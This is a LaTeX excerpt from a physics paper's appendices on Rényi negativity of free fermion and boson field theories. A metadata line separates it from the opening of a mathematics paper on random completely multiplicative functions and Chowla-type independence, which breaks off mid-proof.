We now carry out this process for ${Z}_{{\cal N}_n}^{({\rm ns})}$ in Eq.~(\ref{eq:ZRk_NS}) for two adjacent intervals.
Here, we need to minimize the quantity
\begin{align}
f_{m_1m_2m_3}(\nu)=(\nu+m_1)^2+(\nu+m_3)^2+(-2\nu+m_2)^2
\end{align}
for a given $\nu=k/n=-(n-1)/2n,\cdots,(n-1)/2n$ by finding the integers $(m_1,m_2,m_3)$ constrained by $\sum_i m_i=0$.
For instance, let us compare $(0,0,0)$ with $(-1,1,0)$,
\begin{align}
f_{000}(\nu) &= 6\nu^2, \\
f_{-110}(\nu) &= 6\nu^2-6\nu+2.
\end{align}
So, we have
\begin{align}
f_{000}(\nu) > f_{-110}(\nu) \qquad \text{for} \quad \nu>\frac{1}{3}.
\end{align}
Similarly, we find that
\begin{align}
f_{000}(\nu) > f_{1-10}(\nu) \qquad \text{for} \quad \nu<-\frac{1}{3}.
\end{align}
In summary, we resolve the flux ambiguity by adding the triplet $(m_1,m_2,m_3)$ as follows
\begin{align}
\left\{ \begin{array}{lll}
(0,0,0) & & |\nu|\leq 1/3 \\
(-1,1,0), (0,1,-1) & & \nu>1/3 \\
(1,-1,0), (0,-1,1) & & \nu<-1/3 .
\end{array} \right.
\end{align}
This leads us to write Eq.~(\ref{eq:Z_NS_adjacent}). Finally, similar derivation can be carried out to arrive at Eqs. \eqref{eq:Z_NS_bi}, \eqref{eq:Z_R_ad} and \eqref{eq:b_ZRk_R}.
\section{R\'enyi negativity for disjoint intervals}
In this appendix, we derive the RN associated with ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ for two disjoint intervals and show that upon taking the distance between the intervals to zero, we recover the results for two adjacent intervals as discussed in the main text.
\label{app:moments}
\subsection{Moments of $\rho^{{T}_A}$}
This geometry is characterized by $v_A-u_A=\ell_1$, $u_B-v_A=d$, and $v_B-u_B=\ell_2$ (c.f.~Fig.~\ref{fig:Zns_vs_l_dis}(a)).
The leading order term of the momentum decomposed partition function in the case of disjoint intervals is given by
\begin{align} \label{eq:ns_dis}
Z_{k,n}^{(\text{ns})}= c_{k0} \left(\frac{x}{\ell_1\ell_2}\right)^{2k^2/n^2} +\cdots
\end{align}
where
\begin{align} \label{eq:x_ratio}
x =\frac{(\ell_1+\ell_2+d)d}{(\ell_1+d)(\ell_2+d)}.
\end{align}
Consequently, the RN is found to be
\begin{align}
{\cal N}_n^{({\rm ns})}&= \left(\frac{n^2-1}{6n}\right) \ln \left(\frac{x}{\ell_1\ell_2}\right) + \cdots
\end{align}
We compare the above formula with the scaling behavior of the numerical results in Fig.~\ref{fig:Zns_vs_l_dis}(b), where we find that they match.
As a consistency check, we show that the RN between adjacent intervals can be derived as a limiting behavior of
the disjoint intervals. However, we realize from (\ref{eq:ns_dis}) that
$\lim_{d\to 0} Z_{k,n}^{(\text{ns})}=0$~(as is done also in Ref.~\cite{Herzog2016}).
A more careful treatment goes by considering higher order terms coming from different representations in \eqref{eq:scaling}
\begin{align}
Z_{k,n}^{(\text{ns})}&=
c_{k0} \left(\frac{x}{\ell_1\ell_2}\right)^{2\frac{k^2}{n^2}}
+ c_{k1} \left(\frac{x}{\ell_1\ell_2}\right)^{2|\frac{k}{n}|(|\frac{k}{n}|-1)} \left[
g(\ell_1,\ell_2;k/n)+ g(\ell_1+d,\ell_2+d;k/n)\right] + \cdots
\label{eq:NS_disjoint_expansion}
\end{align}
where
$g(x,y;q)=x^{-2} \left(x/y\right)^{2|q|}+x\leftrightarrow y$
and $c_{ki}$ are coefficients dependent on the microscopic details.
Next, we obtain the leading order term in the coincident limit $d=\varepsilon$, where $\varepsilon\ll \ell_1,\ell_2$. To this end, we rewrite the above expansion (\ref{eq:NS_disjoint_expansion}) as
\begin{align}
Z_{k,n}^{(\text{ns})}=\varepsilon^{2k^2/n^2} Z_{k,n}^{(0)}+\varepsilon^{2|k/n|(|k/n|-1)} Z_{k,n}^{(1)} + \cdots
\end{align}
where the scaling dimensions are
\begin{subequations}
\begin{align}
[Z_{k,n}^{(0)}] &\sim L^{-6N^2/n^2}, \\
[Z_{k,n}^{(1)}] &\sim L^{-2(3k^2/n^2-3|k/n|+1)}.
\end{align}
\end{subequations}
As we see, for $|k/n|>1/3$, the second term is dominant. This immediately implies that upon taking $(\ell_i+d)\sim \ell_i$, we recover the original result (\ref{eq:Z_NS_adjacent}).
\subsection{Moments of $\rho^{\widetilde{T}_A}$}
Similarly, we find the $k$-th contribution to the $n$-th moment of $\rho^{\widetilde{T}_A}$ to be
\begin{align}
Z_{k,n}^{(\text{r})} =
x^{2|k/n|(|k/n|-1/2)} \frac{1}{\ell_1^{2(|k/n|-1/2)^2} \ell_2^{2k^2/n^2}} +\cdots
\label{eq:R_disjoint_expansion}
\end{align}
which gives rise to the following form for the RN,
\begin{align}
\label{eq:R_disjoint}
{\cal N}_n^{({\rm r})} &=
c^{(1)}_n \ln (\ell_1)+ c^{(2)}_n \ln (\ell_2)
+ c^{(3)}_n \ln (x)
+ \cdots
\end{align}
where
\begin{align}
c^{(1)}_{n}
&=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n_o+ \frac{2}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{6} \left( {n_e}- \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}, \
\end{array}
\right.\\
c^{(2)}_{n} & = - \left( \frac{n^2-1}{6n} \right), \\
c^{(3)}_{n}
& =
\left\{
\begin{array}{ll}
-\frac{1}{12} \left( n_o- \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
We compare the scaling behaviors of analytical expressions and numerical results in Fig.~\ref{fig:Zns_vs_l_dis}(c). As we see, they are in good agreement.
It is easy to verify that taking the adjacent limit $d= \varepsilon$ of two disjoint intervals in Eq.~(\ref{eq:R_disjoint}) leads to Eq.~(\ref{eq:R_adjacent}).
We should note that in this case the leading order term in the momentum expansion (\ref{eq:R_disjoint_expansion}) remains always the same (\ref{eq:R_disjoint_expansion}) in contrast with the previous case (\ref{eq:NS_disjoint_expansion}).
\begin{figure}
\center
\includegraphics[scale=.93]{Nn_scaling_disjoint}
\caption{\label{fig:Zns_vs_l_dis}
Comparison of numerical (dots) and analytical (solid lines) results for the scaling behavior of the moments of partial transpose (\ref{eq:pTR_NS}) and (\ref{eq:pTR_R}) for two disjoint intervals (the geometry is shown in panel (a)). Here, $d=40$ and intervals have equal lengths $\ell_1=\ell_2=\ell$ where $20\leq \ell\leq 200$ on an infinite chain. The analytical results are given by Eq.~\eqref{eq:ns_dis} in panel (b) and Eq.~\eqref{eq:R_disjoint_expansion} in panel(c). Different colors correspond to different moments $n$.}
\end{figure}
\section{Partial transpose with supersymmetric trace}
\label{app:susy}
Let
\begin{align}
\label{eq:moments_susy}
{\cal N}_n^{({\rm susy})} (\rho)=\ln \widetilde\text{Tr} [(\rho^{\widetilde{T}_A})^n],
\end{align}
where $\widetilde\text{Tr} $ is the supersymmetric (susy) trace for the interval $A$.
The susy trace is distinct from the regular trace in that the $T$ matrix which
glues together $\rho^{\widetilde{T}_A}$ for fermions is given by (\ref{eq:Tmat}), while the susy
trace is similar to a bosonic trace (even though applied to a fermionic density
matrix) where the $T$ matrix is given by (\ref{eq:Tmat_b}) (see below). It is
easy to see that $T^n=(-1)^{n-1}$ for the regular trace of fermionic density
matrices whereas $T^{n}=1$ for the susy trace. Clearly, there is no difference
between the susy and regular traces for even $n$ when considering $(\rho^{\widetilde{T}_A})^n$. The susy trace was used
previously to define the susy entanglement entropies~\cite{Giveon2016}.
(See Refs.\ \cite{2013JHEP...10..155N, 2016JHEP...03..058M, 2018RvMP...90c5007N} for related works.)
In terms of the partial transpose (\ref{eq:fermion_pt}), the susy trace is simplified into
\begin{align} \label{eq:pathTR0}
{\cal N}_n^{({\rm susy})} (\rho) =\left\{ \begin{array}{ll}
\ln \text{Tr} (\rho^{T_A} \rho^{T_A\dag} \cdots \rho^{T_A}\rho^{T_A\dag})& \ \ n\ \text{even}, \\
\ln \text{Tr} (\rho^{T_A} \rho^{T_A\dag} \cdots \rho^{T_A}) & \ \ n\ \text{odd},
\end{array} \right.
\end{align}
which was studied by some of us in~\cite{Shap_pTR} and was shown to obey the same expressions as the bosonic negativity~\cite{Calabrese2013} for both even and odd values of $n$. In this appendix, we briefly report the results for various geometries.
A technical point is that the monodromy of the field around $ {\widetilde{\cal T}}_{k,n} $ for the susy trace is given by $\psi_k\mapsto e^{\pm i(2\pi k/n-\varphi_n)} \psi_k$ where $\varphi_n=\pi$ or $\pi (n-1)/n$ for $n$ even or odd, respectively~\cite{Herzog2016,Shap_temp}.
\vspace{0.3cm}
\noindent
\textbf{1. Disjoint intervals:} in this case the moments \eqref{eq:moments_susy} become
\begin{align}
{\cal N}_n^{({\rm susy})} &=
c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (x)
+ \cdots
\end{align}
where $x$ is defined in (\ref{eq:x_ratio}),
$c^{(1)}_{n} = -(n^2-1)/6n$,
and
\begin{align}
c^{(2)}_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{12} \left( n_o- \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
\vspace{0.3cm}
\noindent
\textbf{2. Adjacent intervals:} when the distance $d \to 0$, i.e., $x \to 0$ in the above expression, the moments take the form
\begin{align}
{\cal N}_n^{({\rm susy})}
&= c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (\ell_1+\ell_2) + \cdots
\end{align}
where
\begin{align}
c^{(1)}_{n_o} &=c^{(2)}_{n_o} = -\frac{1}{12} \left( n_o- \frac{1}{n_o} \right),
\end{align}
for odd $n=n_o$, and
\begin{align}
c^{(1)}_{n_e} & = -\frac{1}{6} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right), \\
c^{(2)}_{n_e} &= -\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right),
\end{align}
for even $n=n_e$.
\iffalse
From (\ref{eq:anal_cont_f}) we arrive at the familiar result for the logarithmic negativity,
\begin{align} \label{eq:cleanCFT}
{\cal E} = \frac{c}{4} \ln \left( \frac{\ell_1\ell_2}{\ell_1+\ell_2} \right) + \cdots
\end{align}
For equal length intervals, we have ${\cal N}_n^{({\rm r})}=c_n \ln \ell$
\begin{align}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{4} \left( n_o- \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{2} \left( \frac{{n_e}}{2}- \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
\begin{figure}
\center
\includegraphics[scale=.91]{figs/Nn_susy_scaling}
\caption{\label{fig:susy_vs_l}
Comparison of numerics and analytical results for the scaling behavior of the moments of partial transpose (\ref{eq:pTR_NS}) and (\ref{eq:pTR_R}).
(a) Two disjoint intervals: $d=40$
(b) Two adjacent intervals:.
In (a) and (b), intervals have equal lengths $\ell_1=\ell_2=\ell$ and $20\leq \ell\leq 200$.
(c) Bipartite geometry: Total system size is $L=400$ and $20\leq \ell\leq 100$.
Solid lines are analytical results.}
\end{figure}
\begin{align} \label{eq:b_ZRk_R}
Z^{(\text{r})}_{k,n}
= \braket{ {\cal Q}_{k,n}^{-2}(u_A) {\cal Q}_{k,n}^2(v_A) }.
\end{align}
\fi
\vspace{0.5cm}
\noindent
\textbf{3. Bipartite geometry:} finally, in this case one has
\begin{align}
{\cal N}_n^{({\rm r})}&= c_n \ln (\ell_1) + \cdots
\end{align}
where
\begin{align}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n_o- \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{3} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
\section{Negativity of bosonic scalar field theory}
\label{app:bosonic}
As we have seen in the main text, calculating negativity boils down to computing correlators of twist fields.
In this appendix, we briefly review the conformal weights of the twist fields in the complex scalar field theory,
\begin{align} \label{eq:scalar}
{\cal L}_\phi=\frac{1}{4\pi} \int |\nabla \phi|^2,
\end{align}
from which we can compute the correlators of twist fields and derive expressions for the entanglement of free bosons.
Similar to fermions, the moments of density matrix in the coherent basis read as
\begin{align}
Z_{{\cal R}_n}=\text{Tr}[\rho^n] =& \int \prod_{i=1}^n d\phi_i d \phi^\ast_i \ \prod_{i=1}^n \left[ \rho(\phi^\ast_i,\phi_i)\right] e^{\sum_{i,j} \phi^\ast_i T_{ij} \phi_j },
\end{align}
where
\begin{align} \label{eq:Tmat_b}
T=\left(\begin{array}{cccc}
0 & 1 & 0 & \dots \\
0 & 0 & 1 & 0 \\
\vdots & \vdots & \ddots & 1 \\
1 & 0 & \cdots & 0 \\
\end{array} \right).
\end{align}
For the moments of the partial transpose, we have
\begin{align}
{Z}_{{\cal N}_n}=\text{Tr}[({\rho^{T_A}} )^n] =& \int \prod_{i=1}^n d\phi_i d \phi^\ast_i \ \prod_{i=1}^n \left[ \rho(\phi^\ast_i,\phi_i)\right]
e^{\sum_{i,j} {\phi^A_i}^{\ast} [ T^{-1}]_{ij} \phi_j^{A} }
e^{\sum_{i,j} {\phi^B_i}^{\ast} T_{ij} \phi_j^{B} }.
\label{eq:pTR_b}
\end{align}
In the case of free bosons, the moments can be written as a product of partition functions of decoupled modes,
\begin{align}
Z_{{\cal R}_n} &= \prod_{k=0}^{n-1} \langle {\cal T}_{k,n}^{-1} (0) {\cal T}_{k,n}(\ell) \rangle, \\
{Z}_{{\cal N}_n} &= \prod_{k=0}^{n-1} \langle {\cal T}_{k,n}^{-1} (-\ell_1) {\cal T}_{k,n}^2(0) {\cal T}_{k,n}^{-1}(\ell_2) \rangle.
\end{align}
Hence, our objective here is to find the conformal weight of ${\cal T}_{k,n}$, ${\cal T}_{k,n}^2$, and their adjoints. It is worth noting that in the case of bosons $k$ takes positive integer values, $k=0,1,\cdots, n-1$. This is because the global boundary condition is periodic, i.e.~the twist matrix obeys $T^n=1$.
As usual in the conformal field theory, the computation goes by placing a twist field ${\cal T}_{k,n}$ at the origin which leads to a ground state ${\cal T}_{k,n}(0) \ket{0}$ where $\phi(z)$ and $ \phi^\ast(z)$ are multivalued fields with the boundary conditions $\phi(e^{i2\pi} z)=e^{i2\pi k/n} \phi(z)$ and $\phi^\ast (e^{i2\pi} z)=e^{-i2\pi k/n} \phi^\ast(z)$.
Next, we compute the correlator
\begin{align}
\braket{\partial_z \phi \partial_w \phi^\ast}_{k/n} := \braket{{\cal T}_{k,n}^{-1}(\infty)|\partial_z \phi \partial_w \phi^\ast |{\cal T}_{k,n}(0)}, \label{eq:bos_corr}
\end{align}
to find the expectation value of the energy-momentum tensor via
\begin{align}
\braket{ T(z) }_{k/n} &= - \lim_{z\to w} \left\langle \frac{1}{2} \partial_z \phi \partial_w \phi^\ast + \frac{1}{(z-w)^2} \right\rangle_{k/n}.
\end{align}
Using the fact that
\begin{align}
T(z) {\cal T}_{k,n}(0)\ket{0} \sim \frac{\Delta_{{\cal T}_{k,n}}}{z^2} {\cal T}_{k,n}(0) \ket{0} +\cdots
\end{align}
we can read off the conformal weight $\Delta_{{\cal T}_{k,n}}$.
Let us start with ${\cal T}_{k,n}$ and ${\cal T}_{k,n}^{-1}$. The correlation function~(\ref{eq:bos_corr}) can be directly computed by the mode expansion of $\phi$ field or can be simply derived from the asymptotic behavior $z\to w$ and $z\to 0$ or $w\to \infty$. The result is found to be~\cite{Dixon1987,Calabrese_disjoint},
\begin{align}
-\frac{1}{2} \braket{\partial_z \phi \partial_w \phi^\ast}_{k/n} &= z^{k/n-1} w^{-k/n} \left[\frac{z(1-k/n)+wk/n}{(z-w)^2}\right],
\end{align}
which leads to
\begin{align} \label{eq:b_twist_dim}
\Delta_{{\cal T}_{k,n}}=\Delta_{{\cal T}_{k,n}^{-1}}= \frac{k}{2n}\left(1-\frac{k}{n}\right).
\end{align}
We should note that doing this calculation for complex Dirac fermions, instead, leads to $\Delta_{{\cal T}_{k,n}}= k^2/2n^2$.
So, the R\'enyi entropies are given by
\begin{align}
{\cal R}_n = \frac{2}{1-n} \sum_{k=0}^{n-1} \Delta_{{\cal T}_{k,n}} \cdot \ln\ell
&=\left(\frac{n+1}{6n}\right) \ln \ell.
\end{align}
One can do a similar calculation for ${\cal T}_{k,n}^2$. In this case, the boundary condition is
$\phi(e^{i2\pi} z)=e^{i4\pi k/n} \phi(z)$.
For $k/n<1/2$, the result is identical to (\ref{eq:b_twist_dim}) up to replacing $k/n$ by $2k/n$. For $1/2<k/n<1$ however, the effective phase shift is $2\pi(2k/n-1)$ and we need to substitute $k/n$ in (\ref{eq:b_twist_dim}) by $2k/n-1$. This result can also be understood from the mode expansion. Consequently, we arrive at
\begin{align}
\arraycolsep=1.4pt\def1.4{1.4}
\Delta_{{\cal T}_{k,n}^2}=\Delta_{{\cal T}_{k,n}^{-2}}=\left\{
\begin{array}{ll}
\frac{k}{n}\left(1-\frac{2k}{n}\right) &\ \ \ \frac{k}{n} \leq \frac{1}{2},\\
\left(\frac{2k}{n}-1\right)\left(1-\frac{k}{n}\right) &\ \ \ \frac{1}{2}\leq \frac{k}{n} <1.
\end{array}
\right.
\end{align}
Using the following expression for the moments of partial transpose,
\begin{align}
{\cal N}_n &= c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (\ell_1+\ell_2) + \cdots
\end{align}
we find
\begin{align}
\arraycolsep=1.4pt\def1.4{1.4}
-c_n^{(1)}=\sum_{k=0}^{n-1} \Delta_{{\cal T}_{k,n}^2} =
\left\{
\begin{array}{ll}
\frac{n^2-4}{12 n} &\ \ \ n\ \ \text{even} \\
\frac{n^2-1}{12 n} &\ \ \ n\ \ \text{odd}
\end{array}
\right.
\end{align}
and
\begin{align}
\arraycolsep=1.4pt\def1.4{1.4}
-c_n^{(2)}=\sum_{k=0}^{n-1}( 2\Delta_{{\cal T}_{k,n}}-\Delta_{{\cal T}_{k,n}^2}) =
\left\{
\begin{array}{ll}
\frac{n^2+2}{12 n} &\ \ \ n\ \ \text{even} \\
\frac{n^2-1}{12 n} &\ \ \ n\ \ \text{odd}
\end{array}
\right.
\end{align}
which are the familiar results~\cite{Calabrese2013}.
\end{appendix}
| 2024-02-18T23:40:09.488Z | 2019-06-12T02:01:04.000Z | algebraic_stack_train_0000 | 1,495 | 17,821 |
|
proofpile-arXiv_065-7355 | \section{Introduction}
Many arithmetic functions of interest are multiplicative, for exemple, the M\"obius function, the Dirichlet characters, or the Liouville function, which is equal to $(-1)^k$ on integers with $k$ prime factors, counted with multiplicity. The behavior of such functions is far from being known with complete accuracy, even if partial results have been proven. This difficulty can be encoded by the corresponding Dirichlet series, which involve the Riemann zeta function. For exemple, the partial sum, up to $x$,
of the M\"obius function in known to be
negligible with respect to $x$, and it is conjectured to be negligible with respect to $x^{r}$ for all $r > 1/2$: the first statement can quite easily be proven to be equivalent to the prime number theorem, whereas the second is equivalent to the Riemann hypothesis.
It has been noticed that the same bound $x^r$ for all $r > 1/2$ is obtained if we take the partial sums of i.i.d., bounded and centered random variables. This suggests the naive idea to compare the M\"obius function on square-free integers with i.i.d. random variables on $\{-1,1\}$. However, a major difference between the two situations is that in the random case, we lose the multiplicativity of the function.
A less naive randomized version of M\"obius functions can be obtained as follows: one takes i.i.d. uniform random variables on $\{-1,1\}$ on prime numbers, $0$ on prime powers of order larger than or equal to $2$, and one completes the definition by multiplicativity.
In \cite{W}, Wintner considers a completely multiplicative function with i.i.d. values at primes, uniform on $\{-1,1\}$ (which corresponds to a randomized version of the Liouville function rather than the M\"obius function), and proves that we have almost surely the same bound $x^{r}$ ($r > 1/2$) for the partial sums, as for the sums of i.i.d. random variables, or for the partial sums of M\"obius function if the Riemann hypothesis is true. The estimate in \cite{W} has been refined by Hal\'asz in \cite{Hal}.
In order to get more general results, it can be useful to consider complex-valued random multiplicative functions. For example, it has been proven by Bohr and Jessen \cite{BJ} that for $\sigma >1/2$,
the law of $\zeta(\sigma + iTU)$, for $U$ uniformly distributed on $[0,1]$, tends to a limiting random variable when $T$ goes to infinity.
This limiting random variable can be written as $\sum_{n \geq 1} X_n n^{-\sigma}$, when $(X_n)_{n \geq 1}$ is a random completely multiplicative function such that $(X_p)_{p \in \mathcal{P}}$ are i.i.d. uniform on the unit circle, $\mathcal{P}$ denoting, as in all the sequel of the present paper, the set of prime numbers. The fact that the series just above converges is a direct consequence (by partial summation) of the analog of the result of Wintner for the partial sums of $(X_n)_{n \geq 1}$: one can prove that $\sum_{n \leq x} X_n = o(x^r)$ for $r > 1/2$.
This discussion shows that it is often much less difficult to prove accurate results for random multiplicative function than for the arithmetic functions which are usually considered. In some informal sense, the arithmetic difficulties are diluted into the randomization, which is much simpler to deal with.
In the present paper, we study another example of results which are stronger and less difficult to prove in the random setting than in the deterministic one.
The example we detail in this article is motivated by the following question, initially posed in the deterministic setting: for $k \geq 1$, what can we say about the distribution of the $k$-uples
$(\mu(n+1), \dots, \mu(n+k))$, or $(\lambda(n+1), \dots, \lambda(n+k))$, where $\mu$ and $\lambda$ are the M\"obius and the Liouville functions,
$n$ varies from $1$ to $N$, $N$ tends to infinity? This question is only very partially solved. One knows (it is essentially a consequence of the prime number theorem), that for $k = 1$, the proportion of integers such that $\lambda$ is equal to $1$ or $-1$ tends to $1/2$. For the M\"obius function, the limiting proportions are $3/\pi^2$ for $1$ or $-1$ and $1 - (6/\pi^2)$ for $0$.
It has be proven by Hildebrand \cite{Hil} that for $k=3$, the eight possible values
of $(\lambda(n+1), \lambda(n+2), \lambda(n+3))$ appears infinitely often. This result has been recently improved by Matom\"aki, Radziwill and Tao \cite{MRT}, who prove that these eight values
appear with a positive lower density: in other words, for all $(\epsilon_1, \epsilon_2, \epsilon_3) \in \{-1,1\}^3$,
$$\underset{N \rightarrow \infty}{\lim \inf} \frac{1}{N} \sum_{n=1}^N
\mathds{1}_{\lambda(n+1) = \epsilon_1,
\lambda(n+2) = \epsilon_2,
\lambda(n+3) = \epsilon_3} > 0.$$
The similar result is proven for the nine possible values of $(\mu(n+1), \mu(n+2))$.
Such results remain open for the M\"obius function and $k \geq 3$, or the Liouville function and $k \geq 4$. A conjecture by Chowla \cite{Ch} states that for all $k \geq 1$, each possible pattern of $(\lambda(n+1), \dots, \lambda(n+k))$ appears with asymptotic density $2^{-k}$.
In the present paper, we prove results similar to this conjecture for random completely multiplicative functions $(X_n)_{n \geq 1}$. The random functions we will consider take i.i.d. values on the unit circle on prime numbers. Their distribution is then
entirely determined by the distribution of $X_2$. The two particular cases we will study in the largest part of the paper are the following: $X_2$ is uniform on the unit circle $\mathbb{U}$, and $X_2$ is uniform on the set $\mathbb{U}_q$ of $q$-th roots of unity, for $q \geq 2$. In this case, we will show the following results: for all $k \geq 1$, and for all $n \geq 1$ large enough depending on $k$, the variables $X_{n+1}, \dots, X_{n+k}$ are independent, and exactly i.i.d. uniform on the unit circle if $X_2$ is uniform. Moreover, the empirical distribution
$$\frac{1}{N} \sum_{n=1}^N \delta_{(X_{n+1}, \dots, X_{n+k})}$$
tends almost surely to the uniform distribution on $\mathbb{U}^k$ if $X_2$ is uniform on $\mathbb{U}$, and to the uniform distribution on $\mathbb{U}_q^k$ if $X_2$ is uniform on $\mathbb{U}_q$.
In particular, the analog of Chowla's conjecture holds almost surely in the case where $X_2$ is uniform on $\{-1,1\}$. We have also an estimate on the speed of convergence of the empirical measure: in the case of the uniform distribution
on $\mathbb{U}_q$, each of the
$q^k$ possible patterns for $(X_{n+1}, \dots, X_{n+k})$ almost surely occurs with a proportion $q^{-k} + O(N^{-t})$ for $n$ running between $1$ and $N$, for all $t < 1/2$. We have a similar result in the uniform case, if the test functions we consider are sufficiently smooth.
It would be interesting to have similar results when the distribution of $X_2$ on the unit circle is not specified. For $k \geq 2$, we are unfortunately not able to show similar results, but we nevertheless can prove that the empirical distribution of $X_n$ almost surely converges to a limiting distribution for any distribution of $X_2$ on the unit circle. We specify this distribution, which is always uniform on $\mathbb{U}$ or uniform on $\mathbb{U}_q$ for some $q \geq 1$, and in the latter case, we give an estimate of the rate of convergence. This rate corresponds to a negative power of $\log N$, which is much slower than what we obtain when $X_2$ is uniform on $\mathbb{U}_q$.
The techniques we use in our proofs are elementary in general, mixing classical tools in probability theory and number theory. However, a part of our arguments need to use deep results on diophantine equations, in order to bound the number and the size of their solutions.
The sequel of the paper is organized as follows. In Sections \ref{uniform} and \ref{uniformq}, we study the law
of $(X_{n+1}, \dots, X_{n+k})$ for $n$ large depending on $k$, first in the case where $X_2$ is uniform on $\mathbb{U}$, then in the case where $X_2$ is uniform on $\mathbb{U}_q$. In Section \ref{uniform2}, we study the empirical measure of
$(X_{n+1}, \dots, X_{n+k})$ in the case of $X_2$ uniform on $\mathbb{U}$. In the proof of the convengence of this empirical measure, we need to estimate the second moment of sums of the form $\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j}$. The problem of estimating moments of order different from two for such sums is discussed in Section \ref{moments}. The proof of convergence of empirical measure in the case of uniform variables on $\mathbb{U}_q$ is given in Section \ref{uniform2q}.
Finally, we consider the case of a general distribution for $X_2$ in Section \ref{general}.
\section{Independence in the uniform case} \label{uniform}
In this section, we suppose that $(X_p)_{p \in
\mathcal{P}}$ are i.i.d. uniform random variables on the unit circle. By convenience, we will extend our multiplicative function to positive rational numbers by setting $X_{p/q} := X_p/X_q$: the result is independent
of the choice of $p$ and $q$, and we have $X_r X_s = X_{rs}$ for all rationals $r, s > 0$. Moreover,
$X_r$ is uniform on the unit circle for all positive rational $r \neq 1$.
In this section, we will show that for fixed $k \geq 1$,
$(X_{n+1},\dots, X_{n+k})$ are independent if $n$ is sufficiently large. The following result gives
a criterion for such independence:
\begin{lemma} \label{1.1}
For all $n, k \geq 1$, the variables $(X_{n+1},\dots, X_{n+k})$ are independent if and only if
$\log(n+1), \dots, \log(n+k)$ are linearly independent on $\mathbb{Q}$.
\end{lemma}
\begin{proof}
Since the variables $(X_{n+1}, \dots, X_{n+k})$ are uniform on the unit circle, they are independent if and only
if
$$\mathbb{E}[X_{n+1}^{m_1} \dots X_{n+k}^{m_k}] = 0$$
for all $(m_1, \dots, m_k) \in \mathbb{Z}^k \backslash \{(0,0, \dots, 0)\}$.
This equality is equivalent to
$$ \mathbb{E}[X_{(n+1)^{m_1} \dots (n+k)^{m_k}}] = 0,$$
i.e. $$(n+1)^{m_1} \dots (n+1)^{m_k} \neq 1$$
or
\begin{equation} m_1 \log (n+1) + \dots + m_k \log (n+k) \neq 0. \label{1}
\end{equation}
\end{proof}
We then get the following result:
\begin{proposition} \label{1.2}
The variables $(X_{n+1}, \dots, X_{n+k})$ are i.i.d. as soon as $n \geq (100k)^{k+1} $. In particular, for $k$ fixed, this property
is true for all but finitely many $n$.
\end{proposition}
\begin{remark}
The same result is proven in \cite{T}, Theorem 3. (i),
with an asymptotically better bound, namely $n \geq e^{ck \log \log (k+2)/ \log (k+1)}$ where $c >0$ is a constant.
However, their proof uses a deep result by Shorey \cite{Sh} on linear forms in the logarithms of algebraic numbers, involving technical tools by Gelfond and Baker, whereas our proof is elementary. Moreover, the constant $c$ involved in \cite{T} is not given, even if it is explicitly computable.
\end{remark}
\begin{proof}
Let us assume that we have a linear dependence \eqref{1} between $\log (n+1), \dots, \log(n+k)$: necessarily $k \geq 2$.
Moreover, the integers $n+j$ for which $m_j \neq 0$ cannot be divisible by a prime larger than $k$: otherwise
this factor remains in the product
$\prod_{\ell=1}^k (n+\ell)^{m_j}$ since none of the $n+\ell$ for $\ell \neq j$ can be divisible by $p$, and then the product cannot be equal to $1$.
We can rewrite the dependence as follows:
$$\log(n+j) = \sum_{\ell \in A} r_{\ell} \log (n+\ell),$$
for a subset $A$ of $\{1, \dots, k\} \backslash \{j\}$ and for $R := (r_{\ell})_{\ell \in A} \in \mathbb{Q}^A$. Let us assume that the cardinality $|A|$ is as small as possible. Taking the decomposition in prime factors, we get for all
$p \in \mathcal{P}$,
$$v_p(n+j) = \sum_{\ell \in A} v_p(n+\ell) r_{\ell}.$$
If $M := (v_p(n+\ell))_{p \in \mathcal{P}, \ell \in A}$, $V := (v_p(n+j))_{p \in \mathcal{P}}$, then we can write
these equalities in a matricial way $V = M R$. The minimality of $|A|$ ensures that the matrix $M$ has rank $|A|$.
Moreover, since all the prime factors of
$n+1, \dots, n+k$ is smaller than $k$,
all the rows of $M$ indexed by prime numbers larger than $k$ are identically zero, and then the rank $|A|$ of $M$ is at most
$\pi(k)$, the number of primes smaller than or equal to $k$.
Moreover, we can extract a subset $\mathcal{Q}$ of $\mathcal{P}$ of cardinality $|A|$ such that the restriction
$M^{(\mathcal{Q})}$ of $M$ to the rows with indices in $\mathcal{Q}$ is invertible.
We have with obvious notation: $V^{(\mathcal{Q})} = M^{(\mathcal{Q})} R$, and then by Cramer's rule,
the entries of $R$ can be written as the quotients of determinants of matrices obtained from $M^{(\mathcal{Q})}$
by replacing one column by $V^{(\mathcal{Q})}$, by the determinant of $M^{(\mathcal{Q})}$.
All the entries involved in these matrices are $p$-adic valuations of integers smaller than or equal to $n+k$, so
they are at most $\log (n+k)/ \log 2$. By Hadamard inequality, the absolute value of the
determinants are smaller than or equal to
